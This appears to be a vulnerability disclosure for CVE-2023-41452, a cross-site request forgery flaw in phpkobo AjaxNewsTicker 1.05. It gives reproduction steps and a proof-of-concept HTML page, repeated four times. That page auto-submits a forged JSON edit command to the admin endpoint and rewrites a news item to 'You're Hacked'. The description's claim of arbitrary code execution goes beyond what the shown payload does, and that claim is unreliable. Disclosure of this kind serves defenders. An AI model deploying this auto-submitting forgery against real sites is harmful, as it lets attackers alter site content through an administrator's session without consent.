RNPG/Cross Site Request Forgery (CSRF) Vulnerability PoC #8 - AjaxNewsTicker - CVE-2023-41452.txt Secret

## Cross Site Request Forgery (CSRF) Vulnerability PoC #8 - AjaxNewsTicker - CVE-2023-41452.txt
Vulnerability Type: Cross Site Request Forgery (CSRF) Vulnerability
Vendor of Product: phpkobo
Affected Product Code Base: AjaxNewsTicker
Product Version: 1.05
Description: Cross Site Request Forgery vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload inside the "txt" parameter in the "news" text in the index.php component.
Attack Vectors: In order to exploit this attack, the attacker needs to manipulate a cross-site request coming from the target and enforce the victim to click on the malicious link.
Attack Type: Remote
Payload:
<html>
 <body>
  <script> history.pushState('','','/')</script>
   <form action="http://localhost:2222/ntic/admin/index.php?_rtp=nticker&_be=1" method="POST" enctype="text/plain">
    <input type="hidden" name="requ" value="&#123;&quot;cmd&quot;&#58;&quot;edit&#95;done&quot;&#44;&quot;id&quot;&#58;&quot;3524&quot;&#44;&quot;form&quot;&#58;&#123;&quot;title&quot;&#58;&quot;test&#95;rnpg50&quot;&#44;&quot;news&quot;&#58;&#91;&#123;&quot;txt&quot;&#58;&quot;You&apos;re&#32;Hacked&quot;&#125;&#93;&#44;&quot;t&#95;movein&quot;&#58;&quot;1000&quot;&#44;&quot;t&#95;pause&quot;&#58;&quot;2000&quot;&#44;&quot;speed&#95;moveout&quot;&#58;&quot;100&quot;&#44;&quot;fc&#95;news&quot;&#58;&quot;&quot;&#44;&quot;bc&#95;news&quot;&#58;&quot;&#35;FFFFFF&quot;&#44;&quot;fc&#95;btn&quot;&#58;&quot;&#35;E0E0E0&quot;&#44;&quot;bc&#95;btn&quot;&#58;&quot;&#35;404040&quot;&#44;&quot;rc&#95;ctar&quot;&#58;&quot;&#35;404040&quot;&#44;&quot;notes&quot;&#58;&quot;&quot;&#44;&quot;pinidx&quot;&#58;0&#125;&#125;"/>
    <input type="submit" value="submit request"/>
   </form>
<script>
      document.forms[0].submit();
    </script>
 </body>
</html>

Assigned CVE-ID: CVE-2023-41452
Discoverer: Pedram Khazaei, Raspina Net Pars Group (RNPG Ltd.)

Steps To Reproduce

1. Browse the the following URL: https://<target.xyz>/ntic/admin/index.php?_rtp=nticker
2. Add a "news"
3. Add some title for newly added "news"
4. Add some text for newly added "news"
5. Insert the payload in the text of the "news"
6. You can execute arbitrary code via a crafted payload to the "txt" parameter in the index.php component.

#PoC

<html>
 <body>
  <script> history.pushState('','','/')</script>
   <form action="http://localhost:2222/ntic/admin/index.php?_rtp=nticker&_be=1" method="POST" enctype="text/plain">
    <input type="hidden" name="requ" value="&#123;&quot;cmd&quot;&#58;&quot;edit&#95;done&quot;&#44;&quot;id&quot;&#58;&quot;3524&quot;&#44;&quot;form&quot;&#58;&#123;&quot;title&quot;&#58;&quot;test&#95;rnpg50&quot;&#44;&quot;news&quot;&#58;&#91;&#123;&quot;txt&quot;&#58;&quot;You&apos;re&#32;Hacked&quot;&#125;&#93;&#44;&quot;t&#95;movein&quot;&#58;&quot;1000&quot;&#44;&quot;t&#95;pause&quot;&#58;&quot;2000&quot;&#44;&quot;speed&#95;moveout&quot;&#58;&quot;100&quot;&#44;&quot;fc&#95;news&quot;&#58;&quot;&quot;&#44;&quot;bc&#95;news&quot;&#58;&quot;&#35;FFFFFF&quot;&#44;&quot;fc&#95;btn&quot;&#58;&quot;&#35;E0E0E0&quot;&#44;&quot;bc&#95;btn&quot;&#58;&quot;&#35;404040&quot;&#44;&quot;rc&#95;ctar&quot;&#58;&quot;&#35;404040&quot;&#44;&quot;notes&quot;&#58;&quot;&quot;&#44;&quot;pinidx&quot;&#58;0&#125;&#125;"/>
    <input type="submit" value="submit request"/>
   </form>
<script>
      document.forms[0].submit();
    </script>
 </body>
</html>
	Vulnerability Type: Cross Site Request Forgery (CSRF) Vulnerability
	Vendor of Product: phpkobo
	Affected Product Code Base: AjaxNewsTicker
	Product Version: 1.05
	Description: Cross Site Request Forgery vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload inside the "txt" parameter in the "news" text in the index.php component.
	Attack Vectors: In order to exploit this attack, the attacker needs to manipulate a cross-site request coming from the target and enforce the victim to click on the malicious link.
	Attack Type: Remote
	Payload:
	<html>
	<body>
	<script> history.pushState('','','/')</script>
	<form action="http://localhost:2222/ntic/admin/index.php?_rtp=nticker&_be=1" method="POST" enctype="text/plain">
	<input type="hidden" name="requ" value="{"cmd":"edit_done","id":"3524","form":{"title":"test_rnpg50","news":[{"txt":"You're Hacked"}],"t_movein":"1000","t_pause":"2000","speed_moveout":"100","fc_news":"","bc_news":"#FFFFFF","fc_btn":"#E0E0E0","bc_btn":"#404040","rc_ctar":"#404040","notes":"","pinidx":0}}"/>
	<input type="submit" value="submit request"/>
	</form>
	<script>
	document.forms[0].submit();
	</script>
	</body>
	</html>

	Assigned CVE-ID: CVE-2023-41452
	Discoverer: Pedram Khazaei, Raspina Net Pars Group (RNPG Ltd.)

	Steps To Reproduce

	1. Browse the the following URL: https://<target.xyz>/ntic/admin/index.php?_rtp=nticker
	2. Add a "news"
	3. Add some title for newly added "news"
	4. Add some text for newly added "news"
	5. Insert the payload in the text of the "news"
	6. You can execute arbitrary code via a crafted payload to the "txt" parameter in the index.php component.

	#PoC

	<html>
	<body>
	<script> history.pushState('','','/')</script>
	<form action="http://localhost:2222/ntic/admin/index.php?_rtp=nticker&_be=1" method="POST" enctype="text/plain">
	<input type="hidden" name="requ" value="{"cmd":"edit_done","id":"3524","form":{"title":"test_rnpg50","news":[{"txt":"You're Hacked"}],"t_movein":"1000","t_pause":"2000","speed_moveout":"100","fc_news":"","bc_news":"#FFFFFF","fc_btn":"#E0E0E0","bc_btn":"#404040","rc_ctar":"#404040","notes":"","pinidx":0}}"/>
	<input type="submit" value="submit request"/>
	</form>
	<script>
	document.forms[0].submit();
	</script>
	</body>
	</html>